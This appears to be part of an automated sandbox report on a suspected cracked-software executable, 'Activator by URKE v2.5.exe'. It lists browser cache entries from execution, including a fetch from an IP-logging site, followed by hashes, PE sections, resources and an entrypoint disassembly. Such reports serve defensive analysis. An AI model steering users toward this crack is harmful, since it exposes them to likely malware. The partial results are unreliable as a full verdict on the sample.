                                                                                                                                                                                                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

                                                                                                                                                                                                                                                Chrome Cache Entry: 73

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (47261)
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):47262
                                                                                                                                                                                                                                                Entropy (8bit):5.3974731018213795
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                                                                                                                                                                                MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                                                                                                                                                                SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                                                                                                                                                                SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                                                                                                                                                                SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js?onload=Jeuhg1&render=explicit
                                                                                                                                                                                                                                                Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

                                                                                                                                                                                                                                                Chrome Cache Entry: 74

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 32 x 55, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                Entropy (8bit):4.068159130770307
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:yionv//thPl34tPghkxl/k4E08up:6v/lhP2Pghk7Tp
                                                                                                                                                                                                                                                MD5:F9E849DB41A0968A2ADC20A5ED43BA7F
                                                                                                                                                                                                                                                SHA1:044C142225F57276DC69B7354EB35ACAC92275B7
                                                                                                                                                                                                                                                SHA-256:5BEBBB2D939A43157ED6DCC06918BDB53CD2F9E5A5D6953EF492B5921E83B6EC
                                                                                                                                                                                                                                                SHA-512:A35869F327C767FB8E35A66187FBFF4D6ECAF18918C808AC1D88E37E40B4FF1E51CC4FEABB804F0CB7749ABC2B62C270377EEBACC778C7ED8F30A7647540738C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccd8289bc184228/1727964569367/0T9ApzVXXVphPFj
                                                                                                                                                                                                                                                Preview:.PNG........IHDR... ...7............IDAT.....$.....IEND.B`.

                                                                                                                                                                                                                                                Chrome Cache Entry: 75

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (47261)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):47262
                                                                                                                                                                                                                                                Entropy (8bit):5.3974731018213795
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                                                                                                                                                                                MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                                                                                                                                                                SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                                                                                                                                                                SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                                                                                                                                                                SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

                                                                                                                                                                                                                                                Chrome Cache Entry: 76

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):2833
                                                                                                                                                                                                                                                Entropy (8bit):7.876846206921263
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                                                                                                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                                                                                                                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                                                                                                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                                                                                                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                URL:https://iplogger.com/favicon.ico
                                                                                                                                                                                                                                                Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

                                                                                                                                                                                                                                                Chrome Cache Entry: 77

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 32 x 55, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                Entropy (8bit):4.068159130770307
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:yionv//thPl34tPghkxl/k4E08up:6v/lhP2Pghk7Tp
                                                                                                                                                                                                                                                MD5:F9E849DB41A0968A2ADC20A5ED43BA7F
                                                                                                                                                                                                                                                SHA1:044C142225F57276DC69B7354EB35ACAC92275B7
                                                                                                                                                                                                                                                SHA-256:5BEBBB2D939A43157ED6DCC06918BDB53CD2F9E5A5D6953EF492B5921E83B6EC
                                                                                                                                                                                                                                                SHA-512:A35869F327C767FB8E35A66187FBFF4D6ECAF18918C808AC1D88E37E40B4FF1E51CC4FEABB804F0CB7749ABC2B62C270377EEBACC778C7ED8F30A7647540738C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.PNG........IHDR... ...7............IDAT.....$.....IEND.B`.

                                                                                                                                                                                                                                                Chrome Cache Entry: 78

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2833
                                                                                                                                                                                                                                                Entropy (8bit):7.876846206921263
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                                                                                                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                                                                                                                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                                                                                                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                                                                                                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Entropy (8bit):7.994982652757958
                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                File name:Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File size:25'037'648 bytes
                                                                                                                                                                                                                                                MD5:95d5f32afd610e2e7077bd350eac99c0
                                                                                                                                                                                                                                                SHA1:8fe090a11768454297c17b31fd164a0f2685eca7
                                                                                                                                                                                                                                                SHA256:9e12b0e0ec0101e6fcb4c10e1b5958e534f937dfdc9394b2095b06f29d22867f
                                                                                                                                                                                                                                                SHA512:34086fc321583b194b8414d54e37641cc68c609883e44e7d8a0f784d607f7e72b60f04616858d0dea44c138baa989cc6e1ab80e136605c96aeb5cb63537b4410
                                                                                                                                                                                                                                                SSDEEP:393216:NB/sqD6yukb4fh801Nvx06Xe7gMOvvOAdPM8vhT9LJmCkhdLI+mYBs0GKLsLAEOA:NFJSa4ay/PMOvQyhT9L8htI+DBhlsUE3
                                                                                                                                                                                                                                                TLSH:C347334F5A90146FD45A7DB009227031F1737CC1D3A4AEE903FAFA192AE7E586CA914F
                                                                                                                                                                                                                                                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........B#..,p..,p..,p.:.p..,p.:.p5.,p.:.p..,p<..p..,p<.(q..,p<./q..,p<.)q..,p...p..,p...p..,p...p..,p..-p..,p2.)q..,p2.,q..,p2..p..,

                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                Icon Hash:070c1c3d5ccf4f38

                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Entrypoint:0x1400266b0
                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                Time Stamp:0x6640972B [Sun May 12 10:17:15 2024 UTC]
                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                OS Version Minor:2
                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                File Version Minor:2
                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                Subsystem Version Minor:2
                                                                                                                                                                                                                                                Import Hash:e8a30656287fe831c9782204ed10cd68

                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                                                call 00007FDBE4B2AEA8h
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                                                jmp 00007FDBE4B2A83Fh
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov eax, esp
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov dword ptr [eax+08h], ebx
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov dword ptr [eax+10h], ebp
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov dword ptr [eax+18h], esi
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov dword ptr [eax+20h], edi
                                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                sub esp, 20h
                                                                                                                                                                                                                                                dec ebp
                                                                                                                                                                                                                                                mov edx, dword ptr [ecx+38h]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov esi, edx
                                                                                                                                                                                                                                                dec ebp
                                                                                                                                                                                                                                                mov esi, eax
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov ebp, ecx
                                                                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                                                                mov edx, ecx
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov ecx, esi
                                                                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                                                                mov edi, ecx
                                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                                mov ebx, dword ptr [edx]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                shl ebx, 04h
                                                                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                                                                add ebx, edx
                                                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                                                lea eax, dword ptr [ebx+04h]
                                                                                                                                                                                                                                                call 00007FDBE4B29E03h
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                and al, 66h
                                                                                                                                                                                                                                                neg al
                                                                                                                                                                                                                                                mov eax, 00000001h
                                                                                                                                                                                                                                                sbb edx, edx
                                                                                                                                                                                                                                                neg edx
                                                                                                                                                                                                                                                add edx, eax
                                                                                                                                                                                                                                                test dword ptr [ebx+04h], edx
                                                                                                                                                                                                                                                je 00007FDBE4B2A9D3h
                                                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                                                mov ecx, edi
                                                                                                                                                                                                                                                dec ebp
                                                                                                                                                                                                                                                mov eax, esi
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov edx, esi
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov ecx, ebp
                                                                                                                                                                                                                                                call 00007FDBE4B2C693h
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov ebx, dword ptr [esp+30h]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov ebp, dword ptr [esp+38h]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov esi, dword ptr [esp+40h]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                mov edi, dword ptr [esp+48h]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                add esp, 20h
                                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                sub esp, 48h
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                lea ecx, dword ptr [esp+20h]
                                                                                                                                                                                                                                                call 00007FDBE4B298D3h
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                lea edx, dword ptr [00023B67h]
                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                lea ecx, dword ptr [esp+20h]
                                                                                                                                                                                                                                                call 00007FDBE4B2BAA2h
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                jmp 00007FDBE4B31870h
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                int3

                                                                                                                                                                                                                                                Rich Headers

                                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x4b1e00x34.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x4b2140x50.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x710000x1f964.rsrc
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6c0000x2ab4.pdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x910000x938.reloc
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x460e00x54.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x461800x28.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3de100x140.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x3b0000x4a0.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4a4ac0x100.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                .text0x10000x398ce0x39a0043edabbddfa6948cff2e968fd336a07dFalse0.5457226138828634data6.465308419785883IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .rdata0x3b0000x1118c0x1120053297ea4f69cf70feab0538ecef732e2False0.44722285583941607data5.215657068009717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .data0x4d0000x1ef5c0x1a0008eb45cbc6a0e70bd1c0a96a66c4a6d0False0.2765925480769231DOS executable (block device driver o\3050)3.1766622656728773IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .pdata0x6c0000x2ab40x2c00703496d6ceba70b1fe234ccc9c454141False0.4807350852272727data5.409685184469512IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .didat0x6f0000x3080x400c445681068e68e0f8df59c5ea517c5e5False0.2421875data2.786346435110699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                _RDATA0x700000x15c0x200b999e3f72a9a42ebb4d9b8fafa0a18e7False0.40625data3.3314534700182197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .rsrc0x710000x1f9640x1fa00e91f632c67ce39b29c85915cd0a6bd9fFalse0.23395040760869565data4.816361806689922IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .reloc0x910000x9380xa00c057cd0b29d094da3cebf433be170d6dFalse0.498828125data5.228587706357198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                PNG0x716440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                                                                                                                                                                PNG0x7218c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                                                                                                                                                                RT_ICON0x737380x2655PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9913380209925609
                                                                                                                                                                                                                                                RT_ICON0x75d900x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m0.0588844197326393
                                                                                                                                                                                                                                                RT_ICON0x865b80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m0.1115375531412376
                                                                                                                                                                                                                                                RT_ICON0x8a7e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.15020746887966804
                                                                                                                                                                                                                                                RT_ICON0x8cd880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.2223264540337711
                                                                                                                                                                                                                                                RT_ICON0x8de300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m0.45478723404255317
                                                                                                                                                                                                                                                RT_DIALOG0x8e2980x286dataEnglishUnited States0.5092879256965944
                                                                                                                                                                                                                                                RT_DIALOG0x8e5200x13adataEnglishUnited States0.60828025477707
                                                                                                                                                                                                                                                RT_DIALOG0x8e65c0xecdataEnglishUnited States0.6991525423728814
                                                                                                                                                                                                                                                RT_DIALOG0x8e7480x12edataEnglishUnited States0.5927152317880795
                                                                                                                                                                                                                                                RT_DIALOG0x8e8780x338dataEnglishUnited States0.45145631067961167
                                                                                                                                                                                                                                                RT_DIALOG0x8ebb00x252dataEnglishUnited States0.5757575757575758
                                                                                                                                                                                                                                                RT_STRING0x8ee040x1e2dataEnglishUnited States0.3900414937759336
                                                                                                                                                                                                                                                RT_STRING0x8efe80x1ccdataEnglishUnited States0.4282608695652174
                                                                                                                                                                                                                                                RT_STRING0x8f1b40x1b8dataEnglishUnited States0.45681818181818185
                                                                                                                                                                                                                                                RT_STRING0x8f36c0x146dataEnglishUnited States0.5153374233128835
                                                                                                                                                                                                                                                RT_STRING0x8f4b40x46cdataEnglishUnited States0.3454063604240283
                                                                                                                                                                                                                                                RT_STRING0x8f9200x166dataEnglishUnited States0.49162011173184356
                                                                                                                                                                                                                                                RT_STRING0x8fa880x152dataEnglishUnited States0.5059171597633136
                                                                                                                                                                                                                                                RT_STRING0x8fbdc0x10adataEnglishUnited States0.49624060150375937
                                                                                                                                                                                                                                                RT_STRING0x8fce80xbcdataEnglishUnited States0.6329787234042553
                                                                                                                                                                                                                                                RT_STRING0x8fda40x1c0dataEnglishUnited States0.5178571428571429
                                                                                                                                                                                                                                                RT_STRING0x8ff640x250dataEnglishUnited States0.44256756756756754
                                                                                                                                                                                                                                                RT_GROUP_ICON0x901b40x5adata0.7666666666666667
                                                                                                                                                                                                                                                RT_MANIFEST0x902100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                DLLImport
